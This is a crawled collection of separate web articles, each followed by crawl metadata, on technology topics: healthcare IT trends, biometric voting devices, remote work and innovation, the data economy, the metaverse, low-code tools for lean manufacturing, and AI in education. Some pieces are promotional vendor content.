It runs other projects similar to the Help Conquer Cancer project, like FightAIDS@Home, which looks for a cure for HIV, plus programs to fight influenza, muscular dystrophy and human protein folding, and research efforts in the field of clean energy.
Andy Patrizio is a senior editor at InternetNews.com, the news service of Internet.com, the network for technology professionals. | <urn:uuid:03421291-b6ea-4419-b9a0-12e076f6b06c> | CC-MAIN-2022-40 | https://cioupdate.com/ibm-volunteers-help-locate-anti-cancer-drugs/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335254.72/warc/CC-MAIN-20220928113848-20220928143848-00094.warc.gz | en | 0.942201 | 892 | 2.828125 | 3 |
The reach of technology innovation in healthcare is getting crazy.
Technology is evolving. Technology is creating more processes. Technology is gathering more and more data. Technology is creating security risks. Technology is replacing conventional monitoring and recording systems. Technology is driving the adoption of devices like smartphones and tablets.
With all these advancements, we created a list of the top 5 technology advancements in healthcare that all IT professionals in healthcare should be aware of.
Mobile health is removing mobility limitations inside clinics and hospitals. Not all, but many healthcare devices are wireless, enabling physicians and patients alike to check on healthcare progress while on the go. Smartphones and tablets allow healthcare providers to freely access and send information, while healthcare apps like epocrates help doctors and nurses better serve patients. Mobile devices are great tools for placing orders, reviewing documentation and interacting with patients.
mHealth isn’t only about wireless connectivity. It has become a tool that gives patients more control and ownership of their overall health. mHealth allows patients to track their weight and blood pressure, even take measurements like an EKG, and simply input the data into a smartphone that transfers it to a healthcare professional.
It’s not without risks. IT staff who work in healthcare need to be extra diligent in ensuring their facility is compliant while keeping patient data secure. There are, as evidenced by this post, technology advancements in healthcare specifically geared toward both security and accessibility.
Studies consistently show the benefits of telemedicine in rural markets. For patients who need help but don’t live close to a healthcare campus, concepts like telemedicine allow providers to offer medical services from hundreds of miles away.
The cost benefits of telemedicine cannot be ignored, either. When patients can receive care, through a video chat with a physician, claims are typically lower as clinical fees are reduced because of the elimination of traditional office costs.
Patients are taking ownership of their healthcare with data, and portal technology is helping them accomplish this. Portal technology allows patients to access their medical records online. This type of technology puts the patient in the driver’s seat, allowing them to become more involved and better educated about their healthcare. Portal technology gives patients a sense of empowerment and responsibility that they haven’t had before. For IT professionals managing this, challenges like compliance and security will arise. Any IT provider, or outsourced IT firm, needs a documented process to prepare for and overcome any pitfalls associated with accessing data online via a portal.
Similar to portal technology, self-service kiosks can help expedite processes like checking in through the hospital registration system. Self-service reduces staffing costs and helps patients validate information that might otherwise be incorrect. Some automated kiosks can even assist patients with paying co-pays, signing paperwork and meeting other registration requirements. That said, hospitals should be cautious when implementing these kiosks so as not to lose a high level of customer service. Interacting with patients is still important and should never be completely eliminated.
Remote monitoring tools.
Monitoring patients’ health at home can reduce costs and unnecessary visits to an M.D.’s office. For example, a patient with cardiac issues may have a pacemaker that automatically transmits data to a remote center. If something in the data looks wrong, the patient can be contacted immediately by their doctor or medical staff. Remote monitoring gives patients peace of mind they never had before by letting others keep watch over their health.
Cooperative Systems supports technology for the healthcare industry.
We have over twenty years of experience in healthcare. Our process helps make your life easier.
Email us here to learn more about how we can help your IT team better serve your patients and internal staff. | <urn:uuid:00470ac8-9108-401e-8037-6367d5299ef9> | CC-MAIN-2022-40 | https://coopsys.com/it-security-compliance-for-business-five-must-know-technology-advancements-in-healthcare/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335365.63/warc/CC-MAIN-20220929194230-20220929224230-00094.warc.gz | en | 0.936043 | 811 | 2.515625 | 3 |
Elections are an important form of political participation, and citizens can strengthen their sense of democracy through electoral activities. With the development of technology, more and more countries are building digital government platforms, and it is becoming increasingly important to verify voters’ identities while ensuring fairness. Some countries vote using fingerprints or ID cards; governments need to register this identity information as well as verify it, which requires a large amount of infrastructure. Governments therefore currently face the following challenges in voting and election activities.
1. The registration and verification of citizenship data, which requires specific infrastructure to support
2. The collection of ballots in remote and mountainous areas, which requires miniaturized and mobile voting methods
3. Fraudulent voting, such as identity theft, multiple voting and other manipulation mechanisms.
In order to avoid identity theft, multiple voting and other voter fraud methods, biometric technology can be used to verify citizens’ identities, guaranteeing that voters match their identity documents and ensuring the fairness of the vote. FEITIAN’s V10P and V11 series of products meet these requirements. Furthermore, the 4G module on the devices also makes it convenient for government officials to collect ballots from remote areas.
Ensure that real-name authentication is in place to avoid identity theft, multiple voting and other voter fraud and manipulation mechanisms.
By Carl Benedikt Frey, Director of the Oxford University Future of Work program
Remote work isn’t a new phenomenon. Before the Industrial Revolution, which took off in England around 1750, the vast majority of the population worked from home. The domestic system, whereby workers make products in their own homes, was predominant in Europe and elsewhere. The typical artisan lived in a cottage with often only one room, which served as both home and workshop. Much like a gig worker today, he decided for himself when a day’s work began and when it ended. In this light, the repulsion many felt toward the factory system is easier to understand. As historian David Landes puts it, the mechanized factory, which gradually replaced the domestic system, “required and eventually created a new breed of worker, broken to the inexorable demands of the clock.”
Before the COVID-19 pandemic, the factory model of working, which the Industrial Revolution created, was still largely intact. Despite striking advances in communications technology, telework remained rare. Across the European Union, the share of the population working from home hovered between 4% and 6% throughout the 2000s and 2010s. And in the US, a recent survey by the Bureau of Labor Statistics found that only 15% of respondents ever had a full day working from home. More striking still, only 2% of employees reported ever having worked from home full time.
Over the past year, however, COVID has forced millions of workers to set up home offices. Right now, working from home accounts for more than 60% of economic activity in the US, a staggering share. Thus, it is hardly an exaggeration to say that we are currently undergoing the largest work experiment in history.
While the switch to remote work has been enormously disruptive for many businesses, it is likely to boost productivity growth over the medium term. As an analogy, consider the strike on the London Underground in February 2014. As many lines were closed, Londoners were forced to rethink their commutes to work. Such disruption meant that many came in late to the office, but it also brought unexpected efficiency gains over the following years.
The economists Shaun Larcom, Ferdinand Rauch and Tim Willems found that while only 5% of commuters stuck to their new route even after the strike, the benefits from that change were long lasting, exceeding the costs produced by the strike, which was a one-off event. In similar fashion, the pandemic has forced businesses to rethink their routines and work processes, albeit on a much greater scale. Virtually every large company that can has switched to remote work.
A key question is to what extent will we work remotely when the pandemic subsides. Indeed, it could be argued that we have seen this movie before. With the arrival of the Web in the 1990s, many thought that remote work would become the new normal. Writing in 1997, economist Frances Cairncross argued that, “In half a century’s time, it may well seem extraordinary that millions of people once trooped from one building (their home) to another (their office) each morning, only to reverse the procedure each evening ... Commuting wastes time and building capacity. One building … the home … often stands empty all day; another … the office … usually stands empty all night. All this may strike our grandchildren as bizarre.”
Others were more skeptical. In 1998, economist Edward Glaeser argued that if we want to understand the future of cities and offices, we need to understand the forces of agglomeration, and how they interact with changes in technology. Glaeser provided two key reasons for why we won’t see the end of offices and cities: digital technologies, he argued, provide poor substitutes for face-to-face meetings and sporadic interactions. However, digital technologies have made a great leap forward since Glaeser published his article. They have become much better substitutes for in-person meetings. What digital technologies are still unable to do, however, is substitute for the “watercooler moments” at the office.
There are good reasons to think that remote work will be the new normal for many. In addition to saving real estate costs and commuting time, many studies have demonstrated that people working from home are more productive. For example, one recent experiment conducted by Stanford’s Nicholas Bloom and collaborators found that remote work increased performance by 13% due to fewer breaks and sick days, and a quieter work environment. The dilemma facing businesses around the world is that while remote work can bring tangible efficiency gains, it makes innovation less likely to happen, which is what drives productivity and business performance over the long run. The most creative ideas aren’t going to come when people work productively in front of their monitors at home. The drive to improve efficiency, in other words, could imperil innovation, which is fundamentally about exploration.
This trade-off is well known to artificial intelligence (AI) researchers: how often should an algorithm try actions it has never taken, versus repeat already-tried actions that are expected to lead to some reward? It is a question they constantly have to grapple with. For example, when the computer program AlphaGo beat world champion Lee Sedol in 2016 in the board game Go, it did so by exploring entirely new moves that most human players had never seen played before. In the second match against Sedol, the AI algorithm made a move so unconventional that there was only a one-in-ten-thousand chance that a human player would make it. And it turned out to be a winning move.
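The exploration/exploitation trade-off described above can be made concrete with an epsilon-greedy bandit, a textbook reinforcement-learning toy (the arm reward probabilities below are invented for illustration): with probability epsilon the algorithm explores a random action; otherwise it exploits the action with the best reward estimate so far.

```python
import random

def epsilon_greedy(true_rewards, epsilon=0.1, steps=10_000, seed=0):
    """Balance exploration (random arm) against exploitation (best-known arm)."""
    rng = random.Random(seed)
    counts = [0] * len(true_rewards)       # pulls per arm
    estimates = [0.0] * len(true_rewards)  # running mean reward per arm
    for _ in range(steps):
        if rng.random() < epsilon:
            arm = rng.randrange(len(true_rewards))          # explore
        else:
            arm = max(range(len(true_rewards)),
                      key=lambda a: estimates[a])           # exploit
        reward = 1.0 if rng.random() < true_rewards[arm] else 0.0
        counts[arm] += 1
        estimates[arm] += (reward - estimates[arm]) / counts[arm]
    return estimates, counts

# Invented reward probabilities; arm 2 is objectively best.
estimates, counts = epsilon_greedy([0.2, 0.5, 0.8])
print("pull counts:", counts)
print("reward estimates:", [round(e, 2) for e in estimates])
```

With no exploration the algorithm can lock onto a mediocre early winner; with too much, it wastes effort on known-bad options — the same tension a business faces between efficient routine and open-ended search.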
Human innovation entails a similar process of exploration. That is why innovating industries have always been highly clustered. From Renaissance Florence, to Manchester during the Industrial Revolution, to contemporary Silicon Valley, cities have acted as “collective brains” by facilitating knowledge transmission and innovation. To be sure, the internet, together with other digital technologies like Zoom and Slack, allows people to work remotely more effectively than ever before. That is why the average geographical distance between co-applicants on the same patent has grown exponentially since the 1990s. And as digital technologies continue to improve, it stands to reason that more work will be done remotely. However, people need to meet somewhere to decide to collaborate in the first place.
Although e-meetings are increasingly common in the post-COVID era — thanks to the miracles of technology — nobody lives in cyberspace. Thus, our virtual interactions mirror our networks in the physical world. Indeed, numerous studies show that many new projects are launched when people meet randomly in various physical settings. For example, we know that collaboration and innovation suffer when important conferences are cancelled.
To realize the efficiency gains from remote work while boosting innovation, business leaders must assess which jobs and tasks are best done remotely, and when the company benefits from employees coming in to the office. To assess this in a systematic way, the remote work matrix to the right offers valuable guidance. As the matrix reveals, whether a job should be done remotely or not is best assessed along two dimensions. The first dimension relates to the importance of knowledge spillovers. In particular, tasks that entail exploration, like developing new ideas and artifacts, benefit from sporadic in-person interactions that do not happen when employees work remotely. Examples of occupations where exploration is important include the jobs of art directors, product developers and software engineers, just to name a few. It is important to remember that even if these jobs can be done remotely, it does not mean that they should be. If companies overdo remote work, innovation and productivity will suffer in the long run.
The second dimension relates to the location specificity of a task. At one extreme, a biolab technician can only do her job in a laboratory. A telemarketer, on the other hand, can work from almost anywhere. To be sure, there are many cases in between. A derivatives trader, for example, can easily work from home, but nonetheless benefits from better and faster computer systems at the office. And while a relationship manager may benefit less from in-person meetings because of knowledge spillovers, she typically needs to be close to her client base.
This matrix has been adopted and modified from Matthew Clancy (2020): The Case for Remote Work, Working Paper.
Thus, in short, tasks or roles that do not benefit from knowledge spillovers and that need not be done at a specific location are best performed remotely. Indeed, they might even be offshored to low-income countries. And as these tasks are digitized and/or offshored, they will become increasingly automatable over time: AI algorithms are capable of learning from digital interactions and will gradually be able to perform more of the tasks previously done by human labor.
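A minimal sketch of this two-dimensional assessment as a rule of thumb — the 0.5 thresholds and the example scores are my own illustrative assumptions, not values from Clancy's working paper:

```python
def remote_work_fit(knowledge_spillovers, location_specificity):
    """Classify a role on the matrix's two dimensions, each scored 0-1."""
    if location_specificity >= 0.5:
        return "on-site"        # the work is tied to a place
    if knowledge_spillovers >= 0.5:
        return "hybrid"         # remote-capable, but office time aids innovation
    return "fully remote"       # candidate for remote work, or even offshoring

# Invented example scores: (knowledge spillovers, location specificity)
roles = {
    "biolab technician": (0.3, 0.9),
    "software engineer": (0.8, 0.1),
    "telemarketer": (0.1, 0.1),
}
for role, (spill, loc) in roles.items():
    print(f"{role}: {remote_work_fit(spill, loc)}")
```

In practice the scoring would be a managerial judgment per task rather than a single number per job, but the decision logic — location specificity first, then spillovers — follows the matrix.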
All the same, looking forward, the key challenge facing companies and managers will be how to harness the benefits of remote work in ways that don’t imperil innovation. Innovation can happen almost anywhere. Research shows that prohibition reduced innovation as fewer people met sporadically. Whether people work remotely or not, companies must facilitate the sporadic interactions that foster innovation, which is ultimately what drives business performance over the long run.
Giving employees the opportunity to work from home can increase productivity and well-being, as many studies have shown.
In-office hours, however, will be needed to drive innovation in many jobs. Moreover, office space must be reconceptualized to maximize the chance of unplanned encounters. If people work from home more, which they will, companies must get their employees to “collide” when they are at the office. For example, at Sky Central in London, a variety of stairs and ramps connect all spaces, which have purposefully been constructed to create multiple routing options that encourage journey variation throughout the office space. This, in turn, facilitates sporadic encounters and augments exploration, allowing both ideas and people to flow on a continuous basis.
This article was written by Carl Benedikt Frey, Director of the Oxford University Future of Work program.
For more insight from Dr. Frey, tune in to the three-part podcast series (part 1, part 2, part 3) “Redesigning Work for the Post-pandemic Age,” where he’s joined by Ben Pring, who leads Cognizant’s Center for the Future of Work, and Mariesa Coughanour, AVP & Head of Cognizant’s Intelligent Automation advisory practice. | <urn:uuid:fdb418e6-db60-4447-bf88-07d2cf26a060> | CC-MAIN-2022-40 | https://www.cognizant.com/us/en/latest-thinking/perspectives/encouraging-innovation-as-work-moves-semi-remote | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335530.56/warc/CC-MAIN-20221001035148-20221001065148-00094.warc.gz | en | 0.965045 | 2,163 | 3.28125 | 3 |
Data: An Invaluable Asset
For more than a decade, the global economy has experienced an unprecedented transformation driven by the digital economy, also known as the fourth industrial revolution. In its first wave, this transformation primarily affected the manufacturing sector; in its second wave, it spread to services and other less digital industries. Current estimates suggest that people spend $1 million per minute on online shopping, while the digital economy accounts for around 16 percent of global GDP. In the U.S., this share is 10 percent, and over the past 10 years its contribution to real GDP growth has been close to 40 percent. Under current trends, by 2050 the share of the digital economy in the U.S. could reach almost 20 percent, and its contribution to real output could reach almost 70 percent.
At the core of the digital economy lies the intersection between data, computing power and connectivity.
Some estimates suggest that 90 percent of all the data in the world was created in the last 2 years. In fact, every day we generate 2.5 exabytes (18 zeros in one exabyte) of data, equivalent to listening to music nonstop for 285 million years. By 2025, there will be 200 zettabytes (21 zeros in one zettabyte) of data, implying far more stored bytes than observable stars in the universe or grains of sand in all of Earth’s beaches. Although humans are generating most of the data, in a few more years this will be mostly created by machines.
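For orientation, each of the storage units above is a factor of 1,000 larger than the last. A quick arithmetic sketch, taking the article's 2.5-exabyte daily figure at face value:

```python
# Decimal (SI) storage units: each prefix is a factor of 1,000.
EB = 10**18  # exabyte, 18 zeros
ZB = 10**21  # zettabyte, 21 zeros

daily_bytes = 2.5 * EB                      # the article's daily estimate
yearly_zettabytes = daily_bytes * 365 / ZB
print(f"~{yearly_zettabytes:.2f} ZB generated per year at today's rate")
```

At under one zettabyte per year, today's rate alone would take centuries to reach 200 zettabytes — which underscores how sharply data creation must accelerate for that 2025 projection to hold.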
Data itself has little intrinsic value. However, once it is analyzed and used to make actionable decisions, it becomes an invaluable asset. The exponential growth of computing power is enabling organizations to identify, store and manage massive and complex datasets. Already, around 50 percent of all corporate data is stored in the cloud. Meanwhile, artificial intelligence (AI), which in broad terms means giving computers the ability to emulate human intelligence, along with big data, machine learning (ML) and deep learning, is allowing organizations to develop algorithms and other tools that can learn and yield predictions to solve complex tasks and make objective decisions. In the past, only large organizations could benefit from AI and ML. However, the advent of third parties offering AI as a service (AIaaS) means that small businesses can also benefit from these trends.
"Companies willing to embrace and unleash the digital revolution amid the uncertainties will have a competitive advantage and grow significantly faster than their competitors"
Enriching AI and ML, delivering on-demand solutions, and expanding new technologies requires super-speed connectivity. The Cloud (computing services via the Internet) and the Internet of Things (IoT, interrelated devices over a network without human interaction) allow a real-time look at ongoing operations and automate processes, which can help track performance, build better strategies and improve the quality of life. For example, smart sensors allow cities to reduce congestion, saving thousands of man-hours, and conserve energy; firms can mitigate supply-chain disruptions, reducing transportation costs and improving delivery times; farmers can control moisture and light, increasing crop production. Meanwhile, wearable devices help monitor first respondents and patients, anticipating risks and saving lives.
Like all technological disruptions, the digital economy implies challenges. Despite there being more IoT devices than people on the planet, the World Bank estimates that 3 billion individuals remain offline and 43 percent of the world’s population do not use mobile internet. The WEF estimates that 80 percent of online content is available in just one-tenth of all languages. Uneven access to digital technologies and inequitable distribution of benefits could lead to greater concentration of market power and inequality. In addition, although technological disruption creates jobs, it also destroys them. Likewise, automated AI and ML algorithms raise legal, regulatory and ethical concerns related to privacy and human biases. Last but not least, information can be stolen or misused, which can have severe destabilizing effects on financial markets, national security, elections and institutions.
Nonetheless, there are also opportunities. A study from MIT shows that data-driven decisions allow companies to reap 5 to 6 percent higher productivity and output growth rates compared to other investments. Businesses also benefit from better organizational management, faster innovation, optimized processes, new products and services, enhanced customer service, and greater value creation. At the aggregate level, economies become more efficient and grow at a faster pace. According to ITU, a 10 percent increase in digitization boosts labor productivity, total factor productivity and GDP per capita by 2.6 percent, 2.3 percent and 1.4 percent, respectively. Other benefits include energy efficiency, more sustainable growth, lower corruption, fraud detection, enhanced working environments, and greater global trade and interconnectedness. According to the McKinsey Global Institute, with open data just seven industries could create $3 to $5 trillion in economic value every year, of which $1.3 to $2.2 trillion would benefit the U.S.
Looking ahead, biometrics, dynamic pricing, hiring and retention analytics, hyper-automation, autonomous vehicles, cryptocurrencies, blockchain technologies & distributed ledgers, quantum & edge computing, bio-chips, nano-robotics, affective computers, the metaverse, virtual reality, human enhancements, nano- & low-orbit satellites, 6G networks, private space travel, green-tech, hydrogen fuel cells, graphene, mRNA vaccines, genetic engineering, and cybersecurity will expand business opportunities.
Companies willing to embrace and unleash the digital revolution amid the uncertainties will have a competitive advantage and grow significantly faster than their competitors. | <urn:uuid:3d744342-96ca-4bc2-ad48-84713c13af53> | CC-MAIN-2022-40 | https://data-integration.cioreview.com/cxoinsight/data-an-invaluable-asset-nid-35945-cid-125.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337322.29/warc/CC-MAIN-20221002115028-20221002145028-00094.warc.gz | en | 0.919257 | 1,133 | 2.8125 | 3 |
By Shelly Palmer
As we transition from the Cenozoic Era (the age of mammals) to the Metazoic Era (the age of metaverses), it should be noted that the vast majority of people entrapped and addicted to social media already live in a metaverse. Social media platforms have nothing to do with reality; the environments depict aspirational worlds where everyone is their very best self. In the metaverse (meta: to describe, verse: egotistically short for universe), everyone lives their ideal lives, visits amazing places, hangs out with incredible people, and has photographic evidence to prove it. In a metaverse, every event is epic, so even mishaps are considered exceptional. How might this evolve? Mark Zuckerberg has an idea.
What is the definition of a Metaverse?
The first time I saw the word “Metaverse” was in Neal Stephenson’s 1992 sci-fi novel “Snow Crash.” The word has evolved over the years to describe immersive virtual worlds. These environments can be experienced on your computer on a 2D screen, but are best experienced using technology such as VR (virtual reality), AR (augmented reality), XR (extended reality), MR (mixed reality), etc. This is where Facebook believes we/they are headed, and they are assembling a high-powered product team to get us/them there.
I’m not sure it’s an aspirational destination. The movie Wall-E comes to mind. It’s easy to imagine a world of couch potatoes spending so much time in the Facebook Metaverse that their limbs atrophy and they need mobility scooters to get around. Let’s hope Facebook’s product team has a better idea.
What the Metaverse isn’t
The definition above makes the assumption that a metaverse is a virtual representation of a thing we currently understand. You hear terms like “virtual world” or “virtual economy” or “virtual space.” The word “virtual” shows up a lot. These definitions are extremely limiting, as they force us to associate something familiar with something we are trying to understand.
I’m OK using metaphorical descriptions as thought starters, but describing features as above suggests that metaverses are destined to be a product of incremental innovations that augment and extend the power of our current big tech overlords. What if we’re on the cusp of a “decentralized multiverse” where each of us uses a plurality of self-sovereign identities to navigate a plurality of metaverses? Is that even a good goal? Is that where we are headed? What assumptions should we use to build our predictive framework?
The State of the Art
Hollywood has given us some fun ways to think about metaverses. Ready Player One and The Matrix are good examples. Until the Metaverse becomes a reality (that made me laugh, too), let’s look at some proto-metaverses to help us frame our thoughts about the future.
Second Life was one of the most successful proto-metaverses. Launched by Linden Lab in 2003, it was a game set in a virtual world. Sadly, the company was unprepared to deal with its explosive growth and it was crushed under the weight of its success.
The metaverse’s ties to video games have continued (and grown) to this day, as spaces designed for gameplay have hosted concerts (like in Fortnite), weddings (like in Animal Crossing), and much more. Video games are often seen as the precursor to metaverses, as the ability for users to don an avatar and digitally represent themselves in a virtual world is a core facet of many of today’s most popular games (like Roblox, in addition to the ones listed above).
Facebook’s metaverse (which is currently in an invite-only beta) is Horizon, and the immersion is handled by Oculus tech (a company Facebook spent $2 billion on in 2014). Horizon offers users the opportunity to “explore, play and create in extraordinary ways,” as in Horizon, “you’re not just a visitor. You’re part of what makes it great.”
Accenture has an internal metaverse they call “the Nth floor” for its half a million employees. It’s a single space that transcends geographical boundaries in a way that no office building ever could.
Decentraland offers a different take on the metaverse: as its name implies, it is decentralized. Its users trade in a digital currency called MANA, and virtual spaces within Decentraland have sold for the equivalent of hundreds of thousands of dollars. Decentraland’s user base has shrunk this year (from hundreds of active users at once, rather than thousands), but its basis as a platform where its creators can build (and companies like Sotheby’s can hold virtual galleries) offers a look at the metaverse that is owned and operated by its users, rather than by a central authority.
Predicting the Evolution of the Metaverse
Could the inventors of cuneiform have predicted the evolution of written communication over the next few millennia? Do not let the current state of the internet and the current limitations of web 2.0 limit your imagination. We are sure to see thousands of attempts by metaverse architects to get to the future first.
Facebook, by virtue of its gigantic size, has a very good opportunity to design and define an equally gigantic metaverse that will be accretive to its shareholders. But that doesn’t mean we are destined to live in that future. Nor does it mean that our Hollywood-informed, technologically limited preconceptions of what a metaverse is supposed to be are even close to correct.
My guess is that, as always, our technological future will be more fantastic, more amazing, and very different from our predictions. If you want to get a sense of how this may play out, start your journey by observing a group of tweens and young teens interacting with each other during a big family gathering (like a wedding). As you can see, they are so bored by where they are, they need to interact in a metaspace like Instagram or WhatsApp or Snapchat, etc. Now imagine the evolution of the space(s) they find more interesting than the reality of the event you are forcing them to attend. Now imagine them interacting with one another in a metaspace or metaverse without the need for handheld devices (glasses, contact lenses, implants, etc). Now, just keep imagining…
Shelly Palmer is the Professor of Advanced Media in Residence at Syracuse University’s S.I. Newhouse School of Public Communications and the CEO of The Palmer Group, a consulting practice that helps Fortune 500 companies with technology, media and marketing. Named LinkedIn’s “Top Voice in Technology,” he covers tech and business for Good Day New York, is a regular commentator on CNN and CNBC and writes a popular daily business blog. He’s the Co-Host of the award-winning podcast Techstream with Shelly Palmer & Seth Everett and his latest book, Blockchain – Cryptocurrency, NFTs & Smart Contracts: An executive guide to the world of decentralized finance, is an Amazon #1 Bestseller. Follow @shellypalmer or visit shellypalmer.com. | <urn:uuid:041d1b4d-0aab-4569-b0d8-f61d25574b68> | CC-MAIN-2022-40 | https://www.architectureandgovernance.com/elevating-ea/what-is-the-metaverse-a-professors-take/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337432.78/warc/CC-MAIN-20221003200326-20221003230326-00094.warc.gz | en | 0.947059 | 1,553 | 2.578125 | 3 |
Lean manufacturing seeks to eliminate or minimize waste and make the production process more efficient. The goal is to streamline production operations while improving customer satisfaction. To deliver on this goal, lean manufacturing optimizes the organization’s production process by adopting a laser focus on the customer. Overall, lean manufacturing is all about removing things that do not add value, thus delivering a product based on customers’ needs and expectations. Using a low-code platform can aid manufacturers in solving an array of issues.
Several studies suggest that production processes only add value 5 percent of the time, while the other 95 percent is waste. Waste in the production process refers to any operation that does not add value and is irrelevant to the customer. This includes transport, motion, inventory, over-processing, waiting, defects, and over-production. This is where lean manufacturing becomes critical and where low-code software can aid in the process.
Benefits of Lean Manufacturing
The philosophy of lean manufacturing was developed by Toyota, one of the biggest and most successful automobile manufacturers, in the form of the Toyota Production System. Toyota pioneered lean manufacturing principles, including just-in-time manufacturing marked by low inventory levels, high levels of automation supervised by a few human workers to control the quality of the product (called jidoka), and reduction of downtime. Let’s take a look at a few specific benefits of lean manufacturing.
#1: Improvement in Customer Service
Adding value for the customer is the first principle of lean manufacturing. It focuses on what customers need or want and when they want it. A company can only be successful if its customers are satisfied. As long as the company provides customers with the products they need at the right time, they will keep returning, and the business will thrive.
#2: Ease of Management
One of the most significant benefits of lean manufacturing is the reduction of human resources. It focuses on achieving more with fewer people. The decrease in the workforce means there are fewer people to manage. This means that a single operator can easily manage many types of equipment. Lean manufacturing is a bottom-up approach where workers try to improve their performance.
#3: Improvement in Quality and Reduction of Defects
Reducing waste and additional costs increases product value and thus quality. Defects in manufacturing quality also become easier to identify and eliminate.
#4: Waste Minimization
One of the essential principles of lean manufacturing is waste minimization. Reduction of waste improves the quality and speed of the production process while increasing value for the customer.
#5: Financial Savings
The reduction in waste and defects brings high financial benefits for manufacturers. The money saved can be used for quality improvement and meeting customers’ needs.
#6: Saving Supply Inventory
With higher quality materials and fewer defects, less supply inventory is consumed during the production process.
What Is Low-Code Software?
The lean manufacturing approach focuses on waste reduction and optimization of the production process. To effectively implement a lean manufacturing approach, manufacturers have to minimize the usage of materials and reduce any production defects. To accomplish this, manufacturers need to effectively track all aspects of the production process, such as the points of highest scrap production, highest material usage, and quality problems. Manufacturers must have faster, easier ways for employees to collect data and monitor systems on the production floor or as part of the quality management process. Traditional paper forms just don’t offer the speed, accuracy, and rich data collection modern manufacturers require.
The solution is low-code/no-code software that helps manufacturers digitize the collection of data to closely track these aspects of the production process. Low-code allows employees who cannot code apps, or “citizen developers,” to quickly develop powerful apps that can track the manufacturing processes (like inventory, inspections, etc.). This allows manufacturers to adopt lean manufacturing practices at a much lower price without hiring experienced developers. In case of any market changes, citizen developers can easily upgrade the software. With low-code/no-code solutions, manufacturers can build quality apps that easily collect data on any mobile device. This allows manufacturing teams to implement lean manufacturing practices more quickly, affordably, and easily.
Low-Code for Lean Manufacturing
Here are a few ways in which low-code furthers lean manufacturing.
More Agility and Greater Automation
As discussed above, quick and efficient delivery is one of the main principles of lean manufacturing. It focuses on delivering products to the customers quickly and easily without any barriers. With low-code/no-code software, manufacturers can create mobile-friendly applications almost ten times faster than with traditional app development techniques. Unlike apps developed the traditional way, low-code/no-code allows for easy and quick changes or updates. Low-code/no-code allows for automation of different processes, including job assignments, user instructions, work instructions, etc. This streamlines the entire production process, allowing managers to stay on top of incoming, completed, and delayed tasks.
Implementing Smart Factories
With the help of low-code platforms, manufacturers get access to real-time data that reflects the machine output, thus gaining greater visibility and productivity. This real-time data is also helpful in pre-empting maintenance needs, which normally require a large downtime.
Like other industries, the manufacturing sector is rapidly evolving to catch up with the incoming wave of digital transformation. The manufacturing sector is entering Industry 4.0 (smart factories) that is powered by technologies like machine learning, artificial intelligence, cloud computing, advanced analytics, etc. Low-code/no-code platforms can help in implementing smart factories by reducing data silos by integrating data from different systems into a single application, predicting real-time customer demands even in the most precarious times, and improving efficiency by interweaving all the systems and processes together.
Since organizations get real-time signals of what’s happening on the production floor, they are in a much better position to improve the efficiency of the entire process. For instance, a 5S audit app built on low-code software allows for quick and efficient visual management of the working facility. 5S helps eliminate unnecessary items, movement, inventory, and lost time on a daily basis. This improves the efficiency and safety of workers. Such integration of systems also helps the workers, who now have to manage fewer interfaces while switching between systems.
Disorganized production processes can create chaos on the production floor. As discussed above, low-code platforms can help develop apps that provide greater visibility to the manufacturer. This allows manufacturers to track the time taken in each segment of the process and understand the best practices associated with it. Then, manufacturers can integrate the best practices into their workflows to ensure that their workers are working to a consistent minimum standard. Low-code apps can be customized to track workers’ activities, location, and productivity. With such access to multiple data points, both workers and managers work together to maximize their performance and productivity, which is one of the key aspects of lean manufacturing.
The Low-Code Approach
Low-code/no-code helps manufacturers implement a lean manufacturing approach and advance toward the Industry 4.0 revolution. The goal is to streamline production operations while improving customer satisfaction. To effectively implement a lean manufacturing approach, manufacturers could benefit from utilizing low-code/no-code software to digitize their collection of data and closely track the production process.
As we settle in from last week’s Texas Computer Education Association TEC-SIG Summit, the largest special interest group established in 1989 for the purpose of providing a means of communication between technology coordinators, instructional technology leaders, and other administrators throughout the state, we’d like to continue the conversations around AI in education.
While artificial intelligence (AI) is yet to permeate our lives on the scale seen in movies such as I, Robot or Minority Report, it’s already widely deployed in numerous industries, including gambling, car manufacturing, online gaming, technology, retail, healthcare, and financial services.
One sector it is tipped to disrupt next is education, long overdue for a shakeup in an era when students are being outperformed in core STEM subjects (science, technology, engineering, and math) by students in a large number of other OECD (Organization for Economic Co-operation and Development) countries.
Key benefits of AI in the classroom
Traditional methods of teaching, or the “mass education” method (untailored to each student’s specific needs) are failing us.
AI’s benefits in the classroom include:
- Bespoke learning: AI can be used to “data-mine” a cohort’s results – or an individual’s – to determine common areas requiring additional or tailored teaching. AI in the areas of language acquisition, math and science (subjects with more fixed rules than a more subjective subject, such as English literature) is already widely available in software applications for fixed PCs and mobile devices.
- Universal access: Education AI holds great promise for helping disadvantaged students “close the gap,” and it can take many forms. For example, it might power apps that can deliver a school syllabus digitally, combining text with video or images; or allow disabled students, or those living in remote or rural areas, to better access educational resources. Further, global learning programs such as Mathletics or Duolingo enable students across the world to interact and learn in a virtual environment.
- Freeing up teachers for more “human-centered” learning: With the rise of education AI and the ability to have an online tutor or knowledge repository that is attuned to your strengths and weaknesses available 24/7, teachers will be freed up to pass on human skills that AI can’t teach such as socialization, negotiation, and prioritization of tasks. With AI already capable of grading multiple-choice exams and running online-testing programs, educators have the potential to spend less time marking, and more time teaching.
Key concerns of AI in education
While AI has great potential to enhance the education sector, the following are some key concerns requiring further consideration by tech developers, governments, and educators globally:
- Education AI can itself be disrupted: Machine-based learning is subject to the availability of internet connectivity and power, and vulnerable to hacking, viruses, and system and software glitches.
- Lack of integration between tech companies, governments, and educators: Where the technology companies behind the rise of education AI fail to take into account the concerns, methods, and findings of real-world educators and governments, the resulting technology may give rise to moral or ethical concerns.
- Privacy and data security: As the rise of AI in education in the mainland Chinese context demonstrates, facial-recognition technology in the classroom can be used to track the engagement of students during class time. But the flip side of this is increased surveillance and data gathering on individuals, the implications of which are as yet unknown.
The rise of AI in education has vital implications for greater student and teacher support, and universal accessibility to educational resources. But tech companies, governments, and educators need to engage in greater dialogue and co-contribution to this burgeoning area of tech to ensure that education AI remains human-centered – or the future envisioned by science fiction movies may result.
